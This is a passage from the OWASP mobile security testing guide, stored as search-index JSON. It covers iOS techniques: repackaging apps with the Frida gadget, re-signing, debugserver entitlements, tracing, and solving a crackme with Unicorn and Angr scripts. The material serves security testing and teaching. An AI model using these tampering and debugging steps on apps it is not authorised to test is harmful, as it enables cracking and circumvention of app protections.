Manually analyzing all the native functions completely will be time consuming and might not be the wisest approach. In such a scenario using a dynamic analysis approach is highly recommended. For instance, by using the techniques like hooking or simply debugging the application, we can easily determine the returned values. Normally it's a good idea to use a dynamic analysis approach and then fallback to manually analyzing the functions in a feedback loop. This way you can benefit from both approaches at the same time while saving time and reducing effort. Dynamic analysis techniques are discussed in \"Dynamic Analysis\" section.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0078/","title":"Automated Static Analysis","text":"Several automated tools for analyzing iOS apps are available; most of them are commercial tools. The free and open source tools MobSF and objection have some static and dynamic analysis functionality. Additional tools are listed in the \"Static Source Code Analysis\" section of the \"Testing Tools\" chapter.
Don't shy away from using automated scanners for your analysis - they help you pick low-hanging fruit and allow you to focus on the more interesting aspects of analysis, such as the business logic. Keep in mind that static analyzers may produce false positives and false negatives; always review the findings carefully.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0079/","title":"Dynamic Analysis on Non-Jailbroken Devices","text":"If you don't have access to a jailbroken device, you can patch and repackage the target app to load a dynamic library at startup (e.g. the Frida gadget to enable dynamic testing with Frida and related tools such as objection). This way, you can instrument the app and do everything you need to do for dynamic analysis (of course, you can't break out of the sandbox this way). However, this technique only works if the app binary isn't FairPlay-encrypted (i.e., obtained from the App Store).
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0079/#automated-repackaging","title":"Automated Repackaging","text":"Objection automates the process of app repackaging. You can find exhaustive documentation on the official wiki pages.
Using objection's repackaging feature is sufficient for most of use cases. However, in some complex scenarios you might need more fine-grained control or a more customizable repackaging process. In that case, you can read a detailed explanation of the repackaging and resigning process in \"Manual Repackaging\".
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0079/#manual-repackaging","title":"Manual Repackaging","text":"Thanks to Apple's confusing provisioning and code-signing system, re-signing an app is more challenging than you would expect. iOS won't run an app unless you get the provisioning profile and code signature header exactly right. This requires learning many concepts-certificate types, Bundle IDs, application IDs, team identifiers, and how Apple's build tools connect them. Getting the OS to run a binary that hasn't been built via the default method (Xcode) can be a daunting process.
We'll use optool, Apple's build tools, and some shell commands. Our method is inspired by Vincent Tan's Swizzler project. The NCC group has described an alternative repackaging method.
To reproduce the steps listed below, download UnCrackable App for iOS Level 1 from the OWASP Mobile Testing Guide repository. Our goal is to make the UnCrackable app load FridaGadget.dylib
during startup so we can instrument the app with Frida.
Please note that the following steps apply to macOS only, as Xcode is only available for macOS.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0079/#getting-a-developer-provisioning-profile-and-certificate","title":"Getting a Developer Provisioning Profile and Certificate","text":"The provisioning profile is a plist file signed by Apple, which adds your code-signing certificate to its list of accepted certificates on one or more devices. In other words, this represents Apple explicitly allowing your app to run for certain reasons, such as debugging on selected devices (development profile). The provisioning profile also includes the entitlements granted to your app. The certificate contains the private key you'll use to sign.
Depending on whether you're registered as an iOS developer, you can obtain a certificate and provisioning profile in one of the following ways:
With an iOS developer account:
If you've developed and deployed iOS apps with Xcode before, you already have your own code-signing certificate installed. Use the security
command (macOS only) to list your signing identities:
$ security find-identity -v\n 1) 61FA3547E0AF42A11E233F6A2B255E6B6AF262CE \"iPhone Distribution: Company Name Ltd.\"\n 2) 8004380F331DCA22CC1B47FB1A805890AE41C938 \"iPhone Developer: Bernhard M\u00fcller (RV852WND79)\"\n
Log into the Apple Developer portal to issue a new App ID, then issue and download the profile. An App ID is a two-part string: a Team ID supplied by Apple and a bundle ID search string that you can set to an arbitrary value, such as com.example.myapp
. Note that you can use a single App ID to re-sign multiple apps. Make sure you create a development profile and not a distribution profile so that you can debug the app.
In the examples below, I use my signing identity, which is associated with my company's development team. I created the App ID \"sg.vp.repackaged\" and the provisioning profile \"AwesomeRepackaging\" for these examples. I ended up with the file AwesomeRepackaging.mobileprovision
-replace this with your own filename in the shell commands below.
With a Regular Apple ID:
Apple will issue a free development provisioning profile even if you're not a paying developer. You can obtain the profile via Xcode and your regular Apple account: simply create an empty iOS project and extract embedded.mobileprovision
from the app container, which is in the Xcode subdirectory of your home directory: ~/Library/Developer/Xcode/DerivedData/<ProjectName>/Build/Products/Debug-iphoneos/<ProjectName>.app/
. The NCC blog post \"iOS instrumentation without jailbreak\" explains this process in great detail.
Once you've obtained the provisioning profile, you can check its contents with the security
command. You'll find the entitlements granted to the app in the profile, along with the allowed certificates and devices. You'll need these for code-signing, so extract them to a separate plist file as shown below. Have a look at the file contents to make sure everything is as expected.
$ security cms -D -i AwesomeRepackaging.mobileprovision > profile.plist\n$ /usr/libexec/PlistBuddy -x -c 'Print :Entitlements' profile.plist > entitlements.plist\n$ cat entitlements.plist\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n<dict>\n <key>application-identifier</key>\n <string>LRUD9L355Y.sg.vantagepoint.repackage</string>\n <key>com.apple.developer.team-identifier</key>\n <string>LRUD9L355Y</string>\n <key>get-task-allow</key>\n <true/>\n <key>keychain-access-groups</key>\n <array>\n <string>LRUD9L355Y.*</string>\n </array>\n</dict>\n</plist>\n
Note the application identifier, which is a combination of the Team ID (LRUD9L355Y) and Bundle ID (sg.vantagepoint.repackage). This provisioning profile is only valid for the app that has this App ID. The get-task-allow
key is also important: when set to true
, other processes, such as the debugging server, are allowed to attach to the app (consequently, this would be set to false
in a distribution profile).
lsof
is a powerful command, and provides a plethora of information about a running process. It can provide a list of all open files, including a stream, a network file or a regular file. When invoking the lsof
command without any option it will list all open files belonging to all active processes on the system, while when invoking with the flags -c <process name>
or -p <pid>
, it returns the list of open files for the specified process. The man page shows various other options in detail.
Using lsof
for an iOS application running with PID 2828, list various open files as shown below.
iPhone:~ root# lsof -p 2828\nCOMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME\niOweApp 2828 mobile cwd DIR 1,2 864 2 /\niOweApp 2828 mobile txt REG 1,3 206144 189774 /private/var/containers/Bundle/Application/F390A491-3524-40EA-B3F8-6C1FA105A23A/iOweApp.app/iOweApp\niOweApp 2828 mobile txt REG 1,3 5492 213230 /private/var/mobile/Containers/Data/Application/5AB3E437-9E2D-4F04-BD2B-972F6055699E/tmp/com.apple.dyld/iOweApp-6346DC276FE6865055F1194368EC73CC72E4C5224537F7F23DF19314CF6FD8AA.closure\niOweApp 2828 mobile txt REG 1,3 30628 212198 /private/var/preferences/Logging/.plist-cache.vqXhr1EE\niOweApp 2828 mobile txt REG 1,2 50080 234433 /usr/lib/libobjc-trampolines.dylib\niOweApp 2828 mobile txt REG 1,2 344204 74185 /System/Library/Fonts/AppFonts/ChalkboardSE.ttc\niOweApp 2828 mobile txt REG 1,2 664848 234595 /usr/lib/dyld\n...\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0081/","title":"Get Open Connections","text":"lsof
command when invoked with option -i
, it gives the list of open network ports for all active processes on the device. To get a list of open network ports for a specific process, the lsof -i -a -p <pid>
command can be used, where -a
(AND) option is used for filtering. Below a filtered output for PID 1 is shown.
iPhone:~ root# lsof -i -a -p 1\nCOMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME\nlaunchd 1 root 27u IPv6 0x69c2ce210efdc023 0t0 TCP *:ssh (LISTEN)\nlaunchd 1 root 28u IPv6 0x69c2ce210efdc023 0t0 TCP *:ssh (LISTEN)\nlaunchd 1 root 29u IPv4 0x69c2ce210eeaef53 0t0 TCP *:ssh (LISTEN)\nlaunchd 1 root 30u IPv4 0x69c2ce210eeaef53 0t0 TCP *:ssh (LISTEN)\nlaunchd 1 root 31u IPv4 0x69c2ce211253b90b 0t0 TCP 192.168.1.12:ssh->192.168.1.8:62684 (ESTABLISHED)\nlaunchd 1 root 42u IPv4 0x69c2ce211253b90b 0t0 TCP 192.168.1.12:ssh->192.168.1.8:62684 (ESTABLISHED)\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0082/","title":"Get Loaded Native Libraries","text":""},{"location":"MASTG/techniques/ios/MASTG-TECH-0082/#using-objection","title":"Using Objection","text":"You can use the list_frameworks
command in objection to list all the application's bundles that represent Frameworks.
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ios bundles list_frameworks\nExecutable Bundle Version Path\n-------------- ----------------------------------------- --------- -------------------------------------------\nBolts org.cocoapods.Bolts 1.9.0 ...8/DVIA-v2.app/Frameworks/Bolts.framework\nRealmSwift org.cocoapods.RealmSwift 4.1.1 ...A-v2.app/Frameworks/RealmSwift.framework\n ...ystem/Library/Frameworks/IOKit.framework\n...\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0082/#using-frida","title":"Using Frida","text":"In Frida REPL process related information can be obtained using the Process
command. Within the Process
command the function enumerateModules
lists the libraries loaded into the process memory.
[iPhone::com.iOweApp]-> Process.enumerateModules()\n[\n {\n \"base\": \"0x10008c000\",\n \"name\": \"iOweApp\",\n \"path\": \"/private/var/containers/Bundle/Application/F390A491-3524-40EA-B3F8-6C1FA105A23A/iOweApp.app/iOweApp\",\n \"size\": 49152\n },\n {\n \"base\": \"0x1a1c82000\",\n \"name\": \"Foundation\",\n \"path\": \"/System/Library/Frameworks/Foundation.framework/Foundation\",\n \"size\": 2859008\n },\n {\n \"base\": \"0x1a16f4000\",\n \"name\": \"libobjc.A.dylib\",\n \"path\": \"/usr/lib/libobjc.A.dylib\",\n \"size\": 200704\n },\n\n ...\n
Similarly, information related to various threads can be obtained.
Process.enumerateThreads()\n[\n {\n \"context\": {\n ...\n },\n \"id\": 1287,\n \"state\": \"waiting\"\n },\n\n ...\n
The Process
command exposes multiple functions which can be explored as per needs. Some useful functions are findModuleByAddress
, findModuleByName
and enumerateRanges
besides others.
On iOS, each application gets a sandboxed folder to store its data. As per the iOS security model, an application's sandboxed folder cannot be accessed by another application. Additionally, the users do not have direct access to the iOS filesystem, thus preventing browsing or extraction of data from the filesystem. In iOS < 8.3 there were applications available which can be used to browse the device's filesystem, such as iExplorer and iFunBox, but in the recent version of iOS (>8.3) the sandboxing rules are more stringent and these applications do not work anymore. As a result, if you need to access the filesystem it can only be accessed on a jailbroken device. As part of the jailbreaking process, the application sandbox protection is disabled and thus enabling an easy access to sandboxed folders.
The contents of an application's sandboxed folder has already been discussed in \"Accessing App Data Directories\" in the chapter iOS Basic Security Testing. This chapter gives an overview of the folder structure and which directories you should analyze.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0084/","title":"Debugging","text":"Coming from a Linux background you'd expect the ptrace
system call to be as powerful as you're used to but, for some reason, Apple decided to leave it incomplete. iOS debuggers such as LLDB use it for attaching, stepping or continuing the process but they cannot use it to read or write memory (all PT_READ_*
and PT_WRITE*
requests are missing). Instead, they have to obtain a so-called Mach task port (by calling task_for_pid
with the target process ID) and then use the Mach IPC interface API functions to perform actions such as suspending the target process and reading/writing register states (thread_get_state
/thread_set_state
) and virtual memory (mach_vm_read
/mach_vm_write
).
For more information you can refer to the LLVM project in GitHub which contains the source code for LLDB as well as Chapter 5 and 13 from \"Mac OS X and iOS Internals: To the Apple's Core\" [#levin] and Chapter 4 \"Tracing and Debugging\" from \"The Mac Hacker's Handbook\" [#miller].
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0084/#debugging-with-lldb","title":"Debugging with LLDB","text":"The default debugserver executable that Xcode installs can't be used to attach to arbitrary processes (it is usually used only for debugging self-developed apps deployed with Xcode). To enable debugging of third-party apps, the task_for_pid-allow
entitlement must be added to the debugserver executable so that the debugger process can call task_for_pid
to obtain the target Mach task port as seen before. An easy way to do this is to add the entitlement to the debugserver binary shipped with Xcode.
To obtain the executable, mount the following DMG image:
/Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/DeviceSupport/<target-iOS-version>/DeveloperDiskImage.dmg\n
You'll find the debugserver executable in the /usr/bin/
directory on the mounted volume. Copy it to a temporary directory, then create a file called entitlements.plist
with the following content:
<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/ PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n<dict>\n <key>com.apple.springboard.debugapplications</key>\n <true/>\n <key>run-unsigned-code</key>\n <true/>\n <key>get-task-allow</key>\n <true/>\n <key>task_for_pid-allow</key>\n <true/>\n</dict>\n</plist>\n
Apply the entitlement with codesign:
codesign -s - --entitlements entitlements.plist -f debugserver\n
Copy the modified binary to any directory on the test device. The following examples use usbmuxd to forward a local port through USB.
iproxy 2222 22\nscp -P 2222 debugserver root@localhost:/tmp/\n
Note: On iOS 12 and higher, use the following procedure to sign the debugserver binary obtained from the XCode image.
1) Copy the debugserver binary to the device via scp, for example, in the /tmp folder.
2) Connect to the device via SSH and create the file, named entitlements.xml, with the following content:
```xml\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n<dict>\n <key>platform-application</key>\n <true/>\n <key>com.apple.private.security.no-container</key>\n <true/>\n <key>com.apple.private.skip-library-validation</key>\n <true/>\n <key>com.apple.backboardd.debugapplications</key>\n <true/>\n <key>com.apple.backboardd.launchapplications</key>\n <true/>\n <key>com.apple.diagnosticd.diagnostic</key>\n <true/>\n <key>com.apple.frontboard.debugapplications</key>\n <true/>\n <key>com.apple.frontboard.launchapplications</key>\n <true/>\n <key>com.apple.security.network.client</key>\n <true/>\n <key>com.apple.security.network.server</key>\n <true/>\n <key>com.apple.springboard.debugapplications</key>\n <true/>\n <key>com.apple.system-task-ports</key>\n <true/>\n <key>get-task-allow</key>\n <true/>\n <key>run-unsigned-code</key>\n <true/>\n <key>task_for_pid-allow</key>\n <true/>\n</dict>\n</plist>\n```\n
3) Type the following command to sign the debugserver binary:
```bash\nldid -Sentitlements.xml debugserver\n```\n
4) Verify that the debugserver binary can be executed via the following command:
```bash\n./debugserver\n```\n
You can now attach debugserver to any process running on the device.
VP-iPhone-18:/tmp root# ./debugserver *:1234 -a 2670\ndebugserver-@(#)PROGRAM:debugserver PROJECT:debugserver-320.2.89\nfor armv7.\nAttaching to process 2670...\n
With the following command you can launch an application via debugserver running on the target device:
debugserver -x backboard *:1234 /Applications/MobileSMS.app/MobileSMS\n
Attach to an already running application:
debugserver *:1234 -a \"MobileSMS\"\n
You may connect now to the iOS device from your host computer:
(lldb) process connect connect://<ip-of-ios-device>:1234\n
Typing image list
gives a list of main executable and all dependent libraries.
In the previous section we learned about how to setup a debugging environment on an iOS device using LLDB. In this section we will use this information and learn how to debug a 3rd party release application. We will continue using the UnCrackable App for iOS Level 1 and solve it using a debugger.
In contrast to a debug build, the code compiled for a release build is optimized to achieve maximum performance and minimum binary build size. As a general best practice, most of the debug symbols are stripped for a release build, adding a layer of complexity when reverse engineering and debugging the binaries.
Due to the absence of the debug symbols, symbol names are missing from the backtrace outputs and setting breakpoints by simply using function names is not possible. Fortunately, debuggers also support setting breakpoints directly on memory addresses. Further in this section we will learn how to do so and eventually solve the crackme challenge.
Some groundwork is needed before setting a breakpoint using memory addresses. It requires determining two offsets:
iOS is a modern operating system with multiple techniques implemented to mitigate code execution attacks, one such technique being Address Space Randomization Layout (ASLR). On every new execution of an application, a random ASLR shift offset is generated, and various process' data structures are shifted by this offset.
The final breakpoint address to be used in the debugger is the sum of the above two addresses (Breakpoint offset + ASLR shift offset). This approach assumes that the image base address (discussed shortly) used by the disassembler and iOS is the same, which is true most of the time.
When a binary is opened in a disassembler like Ghidra, it loads a binary by emulating the respective operating system's loader. The address at which the binary is loaded is called image base address. All the code and symbols inside this binary can be addressed using a constant address offset from this image base address. In Ghidra, the image base address can be obtained by determining the address of the start of a Mach-O file. In this case, it is 0x100000000.
From our previous analysis of the UnCrackable App for iOS Level 1 in \"Manual (Reversed) Code Review\" section, the value of the hidden string is stored in a label with the hidden
flag set. In the disassembly, the text value of this label is stored in register X21
, stored via mov
from X0
, at offset 0x100004520. This is our breakpoint offset.
For the second address, we need to determine the ASLR shift offset for a given process. The ASLR offset can be determined by using the LLDB command image list -o -f
. The output is shown in the screenshot below.
In the output, the first column contains the sequence number of the image ([X]), the second column contains the randomly generated ASLR offset, while 3rd column contains the full path of the image and towards the end, content in the bracket shows the image base address after adding ASLR offset to the original image base address (0x100000000 + 0x70000 = 0x100070000). You will notice the image base address of 0x100000000 is same as in Ghidra. Now, to obtain the effective memory address for a code location we only need to add ASLR offset to the address identified in Ghidra. The effective address to set the breakpoint will be 0x100004520 + 0x70000 = 0x100074520. The breakpoint can be set using command b 0x100074520
.
In the above output, you may also notice that many of the paths listed as images do not point to the file system on the iOS device. Instead, they point to a certain location on the host computer on which LLDB is running. These images are system libraries for which debug symbols are available on the host computer to aid in application development and debugging (as part of the Xcode iOS SDK). Therefore, you may set breakpoints to these libraries directly by using function names.
After putting the breakpoint and running the app, the execution will be halted once the breakpoint is hit. Now you can access and explore the current state of the process. In this case, you know from the previous static analysis that the register X0
contains the hidden string, thus let's explore it. In LLDB you can print Objective-C objects using the po
(print object) command.
Voila, the crackme can be easily solved aided by static analysis and a debugger. There are plethora of features implemented in LLDB, including changing the value of the registers, changing values in the process memory and even automating tasks using Python scripts.
Officially Apple recommends use of LLDB for debugging purposes, but GDB can be also used on iOS. The techniques discussed above are applicable while debugging using GDB as well, provided the LLDB specific commands are changed to GDB commands.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0085/","title":"Execution Tracing","text":"Tracing involves recording the information about a program's execution. In contrast to Android, there are limited options available for tracing various aspects of an iOS app. In this section we will be heavily relying on tools such as Frida for performing tracing.
TODO: This needs to be improved as well
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0086/","title":"Method Tracing","text":"Intercepting Objective-C methods is a useful iOS security testing technique. For example, you may be interested in data storage operations or network requests. In the following example, we'll write a simple tracer for logging HTTP(S) requests made via iOS standard HTTP APIs. We'll also show you how to inject the tracer into the Safari web browser.
In the following examples, we'll assume that you are working on a jailbroken device. If that's not the case, you first need to follow the steps outlined in section Repackaging and Re-Signing to repackage the Safari app.
Frida comes with frida-trace
, a function tracing tool. frida-trace
accepts Objective-C methods via the -m
flag. You can pass it wildcards as well-given -[NSURL *]
, for example, frida-trace
will automatically install hooks on all NSURL
class selectors. We'll use this to get a rough idea about which library functions Safari calls when the user opens a URL.
Run Safari on the device and make sure the device is connected via USB. Then start frida-trace
as follows:
$ frida-trace -U -m \"-[NSURL *]\" Safari\nInstrumenting functions...\n-[NSURL isMusicStoreURL]: Loaded handler at \"/Users/berndt/Desktop/__handlers__/__NSURL_isMusicStoreURL_.js\"\n-[NSURL isAppStoreURL]: Loaded handler at \"/Users/berndt/Desktop/__handlers__/__NSURL_isAppStoreURL_.js\"\n(...)\nStarted tracing 248 functions. Press Ctrl+C to stop.\n
Next, navigate to a new website in Safari. You should see traced function calls on the frida-trace
console. Note that the initWithURL:
method is called to initialize a new URL request object.
/* TID 0xc07 */\n 20313 ms -[NSURLRequest _initWithCFURLRequest:0x1043bca30 ]\n 20313 ms -[NSURLRequest URL]\n(...)\n 21324 ms -[NSURLRequest initWithURL:0x106388b00 ]\n 21324 ms | -[NSURLRequest initWithURL:0x106388b00 cachePolicy:0x0 timeoutInterval:0x106388b80\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0087/","title":"Native Code Tracing","text":"As discussed earlier in this chapter, iOS applications can also contain native code (C/C++ code) and it can be traced using the frida-trace
CLI as well. For example, you can trace calls to the open
function by running the following command:
frida-trace -U -i \"open\" sg.vp.UnCrackable1\n
The overall approach and further improvisation for tracing native code using Frida is similar to the one discussed in the Android \"Tracing\" section.
Unfortunately, there are no tools such as strace
or ftrace
available to trace syscalls or function calls of an iOS app. Only DTrace
exists, which is a very powerful and versatile tracing tool, but it's only available for MacOS and not for iOS.
Apple provides a simulator app within Xcode which provides a real iOS device looking user interface for iPhone, iPad or Apple Watch. It allows you to rapidly prototype and test debug builds of your applications during the development process, but actually it is not an emulator. Difference between a simulator and an emulator is previously discussed in \"Emulation-based Dynamic Analysis\" section.
While developing and debugging an application, the Xcode toolchain generates x86 code, which can be executed in the iOS simulator. However, for a release build, only ARM code is generated (incompatible with the iOS simulator). That's why applications downloaded from the Apple App Store cannot be used for any kind of application analysis on the iOS simulator.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0088/#corellium","title":"Corellium","text":"Corellium is a commercial tool which offers virtual iOS devices running actual iOS firmware, being the only publicly available iOS emulator ever. Since it is a proprietary product, not much information is available about the implementation. Corellium has no community licenses available, therefore we won't go into much detail regarding its use.
Corellium allows you to launch multiple instances of a device (jailbroken or not) which are accessible as local devices (with a simple VPN configuration). It has the ability to take and restore snapshots of the device state, and also offers a convenient web-based shell to the device. Finally and most importantly, due to its \"emulator\" nature, you can execute applications downloaded from the Apple App Store, enabling any kind of application analysis as you know it from real iOS (jailbroken) devices.
Note that in order to install an IPA on Corellium devices it has to be unencrypted and signed with a valid Apple developer certificate. See more information here.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0088/#unicorn","title":"Unicorn","text":"Unicorn is a lightweight, multi-architecture CPU emulator framework based on QEMU and goes beyond it by adding useful features especially made for CPU emulation. Unicorn provides the basic infrastructure needed to execute processor instructions. In this section we will use Unicorn's Python bindings to solve the UnCrackable App for iOS Level 1 challenge.
To use Unicorn's full power, we would need to implement all the necessary infrastructure which generally is readily available from the operating system, e.g. binary loader, linker and other dependencies or use another higher level frameworks such as Qiling which leverages Unicorn to emulate CPU instructions, but understands the OS context. However, this is superfluous for this very localized challenge where only executing a small part of the binary will suffice.
While performing manual analysis in \"Reviewing Disassembled Native Code\" section, we determined that the function at address 0x1000080d4 is responsible for dynamically generating the secret string. As we're about to see, all the necessary code is pretty much self-contained in the binary, making this a perfect scenario to use a CPU emulator like Unicorn.
If we analyze that function and the subsequent function calls, we will observe that there is no hard dependency on any external library and neither it's performing any system calls. The only access external to the functions occurs for instance at address 0x1000080f4, where a value is being stored to address 0x10000dbf0, which maps to the __data
section.
Therefore, in order to correctly emulate this section of the code, apart from the __text
section (which contains the instructions) we also need to load the __data
section.
To solve the challenge using Unicorn we will perform the following steps:
lipo -thin arm64 <app_binary> -output uncrackable.arm64
(ARMv7 can be used as well).__text
and __data
section from the binary.__text
and __data
section.To extract the content of __text
and __data
section from the Mach-O binary we will use LIEF, which provides a convenient abstraction to manipulate multiple executable file formats. Before loading these sections to memory, we need to determine their base addresses, e.g. by using Ghidra, Radare2 or IDA Pro.
From the above table, we will use the base address 0x10000432c for __text
and 0x10000d3e8 for __data
section to load them at in the memory.
While allocating memory for Unicorn, the memory addresses should be 4k page aligned and also the allocated size should be a multiple of 1024.
The following script emulates the function at 0x1000080d4 and dumps the secret string:
import lief\nfrom unicorn import *\nfrom unicorn.arm64_const import *\n\n# --- Extract __text and __data section content from the binary ---\nbinary = lief.parse(\"uncrackable.arm64\")\ntext_section = binary.get_section(\"__text\")\ntext_content = text_section.content\n\ndata_section = binary.get_section(\"__data\")\ndata_content = data_section.content\n\n# --- Setup Unicorn for ARM64 execution ---\narch = \"arm64le\"\nemu = Uc(UC_ARCH_ARM64, UC_MODE_ARM)\n\n# --- Create Stack memory ---\naddr = 0x40000000\nsize = 1024*1024\nemu.mem_map(addr, size)\nemu.reg_write(UC_ARM64_REG_SP, addr + size - 1)\n\n# --- Load text section --\nbase_addr = 0x100000000\ntmp_len = 1024*1024\ntext_section_load_addr = 0x10000432c\nemu.mem_map(base_addr, tmp_len)\nemu.mem_write(text_section_load_addr, bytes(text_content))\n\n# --- Load data section ---\ndata_section_load_addr = 0x10000d3e8\nemu.mem_write(data_section_load_addr, bytes(data_content))\n\n# --- Hack for stack_chk_guard ---\n# without this will throw invalid memory read at 0x0\nemu.mem_map(0x0, 1024)\nemu.mem_write(0x0, b\"00\")\n\n\n# --- Execute from 0x1000080d4 to 0x100008154 ---\nemu.emu_start(0x1000080d4, 0x100008154)\nret_value = emu.reg_read(UC_ARM64_REG_X0)\n\n# --- Dump return value ---\nprint(emu.mem_read(ret_value, 11))\n
You may notice that there is an additional memory allocation at address 0x0, this is a simple hack around stack_chk_guard
check. Without this, there will be a invalid memory read error and binary cannot be executed. With this hack, the program will access the value at 0x0 and use it for the stack_chk_guard
check.
To summarize, using Unicorn do require some additional setup before executing the binary, but once done, this tool can help to provide deep insights into the binary. It provides the flexibility to execute the full binary or a limited part of it. Unicorn also exposes APIs to attach hooks to the execution. Using these hooks you can observe the state of the program at any point during the execution or even manipulate the register or variable values and forcefully explore other execution branches in a program. Another advantage when running a binary in Unicorn is that you don't need to worry about various checks like root/jailbreak detection or debugger detection etc.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0089/","title":"Symbolic Execution","text":"An introduction to binary analysis using binary analysis frameworks has already been discussed in the \"Dynamic Analysis\" section for Android. We recommend you to revisit this section and refresh the concepts on this subject.
For Android, we used Angr's symbolic execution engine to solve a challenge. In this section, we will firstly use Unicorn to solve the UnCrackable App for iOS Level 1 challenge and then we will revisit the Angr binary analysis framework to analyze the challenge but instead of symbolic execution we will use its concrete execution (or dynamic execution) features.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0089/#angr","title":"Angr","text":"Angr is a very versatile tool, providing multiple techniques to facilitate binary analysis, while supporting various file formats and hardware instructions sets.
The Mach-O backend in Angr is not well-supported, but it works perfectly fine for our case.
While manually analyzing the code in the Reviewing Disassembled Native Code\" section, we reached a point where performing further manual analysis was cumbersome. The function at offset 0x1000080d4
was identified as the final target which contains the secret string.
If we revisit that function, we can see that it involves multiple sub-function calls and interestingly none of these functions have any dependencies on other library calls or system calls. This is a perfect case to use Angr's concrete execution engine. Follow the steps below to solve this challenge:
lipo -thin arm64 <app_binary> -output uncrackable.arm64
(ARMv7 can be used as well).Project
by loading the above binary.callable
object by passing the address of the function to be executed. From the Angr documentation: \"A Callable is a representation of a function in the binary that can be interacted with like a native python function.\".callable
object to the concrete execution engine, which in this case is claripy.backends.concrete
.import angr\nimport claripy\n\ndef solve():\n\n # Load the binary by creating angr project.\n project = angr.Project('uncrackable.arm64')\n\n # Pass the address of the function to the callable\n func = project.factory.callable(0x1000080d4)\n\n # Get the return value of the function\n ptr_secret_string = claripy.backends.concrete.convert(func()).value\n print(\"Address of the pointer to the secret string: \" + hex(ptr_secret_string))\n\n # Extract the value from the pointer to the secret string\n secret_string = func.result_state.mem[ptr_secret_string].string.concrete\n print(f\"Secret String: {secret_string}\")\n\nsolve()\n
Above, Angr executed an ARM64 code in an execution environment provided by one of its concrete execution engines. The result is accessed from the memory as if the program is executed on a real device. This case is a good example where binary analysis frameworks enable us to perform a comprehensive analysis of a binary, even in the absence of specialized devices needed to run it.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0090/","title":"Patching","text":"IPA files are actually ZIP archives, so you can use any ZIP tool to unpack the archive.
unzip UnCrackable-Level1.ipa\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0090/#patching-example-installing-frida-gadget","title":"Patching Example: Installing Frida Gadget","text":"IF you want to use Frida on non-jailbroken devices you'll need to include FridaGadget.dylib
. Download it first:
curl -O https://build.frida.re/frida/ios/lib/FridaGadget.dylib\n
Copy FridaGadget.dylib
into the app directory and use optool to add a load command to the \"UnCrackable Level 1\" binary.
$ unzip UnCrackable_Level1.ipa\n$ cp FridaGadget.dylib Payload/UnCrackable\\ Level\\ 1.app/\n$ optool install -c load -p \"@executable_path/FridaGadget.dylib\" -t Payload/UnCrackable\\ Level\\ 1.app/UnCrackable\\ Level\\ 1\nFound FAT Header\nFound thin header...\nFound thin header...\nInserting a LC_LOAD_DYLIB command for architecture: arm\nSuccessfully inserted a LC_LOAD_DYLIB command for arm\nInserting a LC_LOAD_DYLIB command for architecture: arm64\nSuccessfully inserted a LC_LOAD_DYLIB command for arm64\nWriting executable to Payload/UnCrackable Level 1.app/UnCrackable Level 1...\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0090/#patching-example-making-an-app-debuggable","title":"Patching Example: Making an App Debuggable","text":"By default, an app available on the Apple App Store is not debuggable. In order to debug an iOS application, it must have the get-task-allow
entitlement enabled. This entitlement allows other processes (like a debugger) to attach to the app. Xcode is not adding the get-task-allow
entitlement in a distribution provisioning profile; it is only whitelisted and added in a development provisioning profile.
Thus, to debug an iOS application obtained from the App Store, it needs to be re-signed with a development provisioning profile with the get-task-allow
entitlement. How to re-sign an application is discussed in the next section.
If you want to use Frida on non-jailbroken devices you'll need to include FridaGadget.dylib
. Download it first:
curl -O https://build.frida.re/frida/ios/lib/FridaGadget.dylib\n
Copy FridaGadget.dylib
into the app directory and use optool to add a load command to the \"UnCrackable Level 1\" binary.
$ unzip UnCrackable-Level1.ipa\n$ cp FridaGadget.dylib Payload/UnCrackable\\ Level\\ 1.app/\n$ optool install -c load -p \"@executable_path/FridaGadget.dylib\" -t Payload/UnCrackable\\ Level\\ 1.app/UnCrackable\\ Level\\ 1\nFound FAT Header\nFound thin header...\nFound thin header...\nInserting a LC_LOAD_DYLIB command for architecture: arm\nSuccessfully inserted a LC_LOAD_DYLIB command for arm\nInserting a LC_LOAD_DYLIB command for architecture: arm64\nSuccessfully inserted a LC_LOAD_DYLIB command for arm64\nWriting executable to Payload/UnCrackable Level 1.app/UnCrackable Level 1...\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0091/#patching-example-making-an-app-debuggable","title":"Patching Example: Making an App Debuggable","text":"By default, an app available on the Apple App Store is not debuggable. In order to debug an iOS application, it must have the get-task-allow
entitlement enabled. This entitlement allows other processes (like a debugger) to attach to the app. Xcode is not adding the get-task-allow
entitlement in a distribution provisioning profile; it is only whitelisted and added in a development provisioning profile.
